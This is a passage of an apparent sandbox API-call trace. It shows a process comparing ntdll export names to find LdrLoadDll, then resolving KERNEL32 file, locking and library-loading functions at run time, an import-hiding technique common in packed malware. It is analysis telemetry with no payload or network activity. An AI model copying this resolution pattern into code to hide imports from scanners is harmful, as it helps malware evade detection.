(lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1 [0202.222] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0 [0202.222] lstrcmpA (lpString1="A_SHAFinal", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="A_SHAInit", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="A_SHAUpdate", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.222] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrClientCallServer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrGetProcessId", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgBreakPoint", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgPrint", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgPrintEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgPrompt", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.223] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiContinue", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventEnabled", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventRegister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventUnregister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWrite", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteString", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.224] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwReplyNotification", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwSendNotification", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwSetMark", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwTraceMessage", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EtwpNotificationThread", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiFastSystemCall", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiIntSystemCall", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrAccessResource", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrAddRefDll", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrEnumResources", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrFindResource_U", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.225] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetFailureData", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrHotPatchRoutine", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrLoadDll", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.226] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="RtlCreateUnicodeStringFromAsciiz") returned -1 [0202.227] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x415fa44, Source="KERNEL32.dll" | out: Destination="KERNEL32.dll") returned 1 [0202.227] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x415fa64 | out: BaseAddress=0x415fa64*=0x76210000) returned 0x0 [0202.227] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFullPathNameW" | out: DestinationString="GetFullPathNameW") [0202.227] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFullPathNameW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762240d4) returned 0x0 [0202.227] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFullPathNameA" | out: DestinationString="GetFullPathNameA") [0202.227] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFullPathNameA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622e2c1) returned 0x0 [0202.227] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="CreateFileA" | out: DestinationString="CreateFileA") [0202.228] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="CreateFileA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762253c6) returned 0x0 [0202.228] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFileSize" | out: DestinationString="GetFileSize") [0202.228] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFileSize", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622196e) returned 0x0 [0202.228] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="SetFilePointer" | out: DestinationString="SetFilePointer") [0202.228] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetFilePointer", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762217d1) returned 0x0 [0202.228] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="MapViewOfFile" | out: DestinationString="MapViewOfFile") [0202.228] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="MapViewOfFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762218f1) returned 0x0 [0202.228] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="UnmapViewOfFile" | out: DestinationString="UnmapViewOfFile") [0202.228] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221826) returned 0x0 [0202.228] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="SetEndOfFile" | out: DestinationString="SetEndOfFile") [0202.229] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetEndOfFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7623ce2e) returned 0x0 [0202.229] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="FreeLibrary" | out: DestinationString="FreeLibrary") [0202.229] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762234c8) returned 0x0 [0202.229] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="QueryPerformanceCounter" | out: DestinationString="QueryPerformanceCounter") [0202.229] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221725) returned 0x0 [0202.229] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="InterlockedCompareExchange" | out: DestinationString="InterlockedCompareExchange") [0202.229] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="InterlockedCompareExchange", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221484) returned 0x0 [0202.229] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="UnlockFile" | out: DestinationString="UnlockFile") [0202.230] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="UnlockFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624cf36) returned 0x0 [0202.230] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LockFile" | out: DestinationString="LockFile") [0202.230] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LockFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624cf1e) returned 0x0 [0202.230] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetTickCount" | out: DestinationString="GetTickCount") [0202.230] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622110c) returned 0x0 [0202.230] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="UnlockFileEx" | out: DestinationString="UnlockFileEx") [0202.230] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="UnlockFileEx", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624d594) returned 0x0 [0202.230] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetSystemTimeAsFileTime" | out: DestinationString="GetSystemTimeAsFileTime") [0202.230] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76223509) returned 0x0 [0202.230] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="FormatMessageA" | out: DestinationString="FormatMessageA") [0202.231] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FormatMessageA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76245fbd) returned 0x0 [0202.231] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="WriteFile" | out: DestinationString="WriteFile") [0202.231] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221282) returned 0x0 [0202.231] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="InitializeCriticalSection" | out: DestinationString="InitializeCriticalSection") [0202.231] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="InitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fd2c42) returned 0x0 [0202.231] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="WideCharToMultiByte" | out: DestinationString="WideCharToMultiByte") [0202.231] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622170d) returned 0x0 [0202.231] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LoadLibraryW" | out: DestinationString="LoadLibraryW") [0202.231] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622492b) returned 0x0 [0202.231] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="Sleep" | out: DestinationString="Sleep") [0202.232] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762210ff) returned 0x0 [0202.232] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="FormatMessageW" | out: DestinationString="FormatMessageW") [0202.232] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FormatMessageW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224620) returned 0x0 [0202.232] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetVersionExW" | out: DestinationString="GetVersionExW") [0202.232] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetVersionExW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221ae5) returned 0x0 [0202.232] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LeaveCriticalSection" | out: DestinationString="LeaveCriticalSection") [0202.232] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fc2270) returned 0x0 [0202.232] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFileAttributesA" | out: DestinationString="GetFileAttributesA") [0202.232] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFileAttributesA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76225414) returned 0x0 [0202.232] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFileAttributesW" | out: DestinationString="GetFileAttributesW") [0202.233] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFileAttributesW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221b18) returned 0x0 [0202.233] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="ReadFile" | out: DestinationString="ReadFile") [0202.233] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76223ed3) returned 0x0 [0202.233] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="CreateFileW" | out: DestinationString="CreateFileW") [0202.233] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76223f5c) returned 0x0 [0202.233] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="MultiByteToWideChar" | out: DestinationString="MultiByteToWideChar") [0202.233] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="MultiByteToWideChar", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622192e) returned 0x0 [0202.233] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="FlushFileBuffers" | out: DestinationString="FlushFileBuffers") [0202.233] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FlushFileBuffers", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622469b) returned 0x0 [0202.233] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetTempPathW" | out: DestinationString="GetTempPathW") [0202.234] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetTempPathW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7623d4dc) returned 0x0 [0202.234] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetLastError" | out: DestinationString="GetLastError") [0202.234] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762211c0) returned 0x0 [0202.234] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetProcAddress" | out: DestinationString="GetProcAddress") [0202.234] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221222) returned 0x0 [0202.234] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LockFileEx" | out: DestinationString="LockFileEx") [0202.234] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LockFileEx", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624d57c) returned 0x0 [0202.234] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="EnterCriticalSection" | out: DestinationString="EnterCriticalSection") [0202.234] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="EnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fc22b0) returned 0x0 [0202.234] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetDiskFreeSpaceW" | out: DestinationString="GetDiskFreeSpaceW") [0202.235] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetDiskFreeSpaceW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7623f7aa) returned 0x0 [0202.235] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LoadLibraryA" | out: DestinationString="LoadLibraryA") [0202.235] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762249d7) returned 0x0 [0202.235] 